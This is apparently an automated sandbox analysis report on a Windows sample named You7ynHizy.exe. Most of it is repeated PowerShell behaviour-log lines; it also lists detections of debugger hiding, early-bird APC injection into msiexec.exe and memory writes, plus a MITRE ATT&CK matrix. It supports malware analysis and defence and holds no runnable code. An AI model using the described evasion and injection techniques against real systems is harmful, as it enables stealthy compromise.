      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6297Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3412Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 5764Thread sleep count: 34 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 5764Thread sleep time: -340000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\You7ynHizy.exeAPI call chain: ExitProcess graph end nodegraph_0-3397
      Source: C:\Users\user\Desktop\You7ynHizy.exeAPI call chain: ExitProcess graph end nodegraph_0-3550
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0097F300 LdrInitializeThunk,LdrInitializeThunk,2_2_0097F300
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts2
      PowerShell      		Boot or Logon Initialization Scripts311
      Process Injection      		131
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager131
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
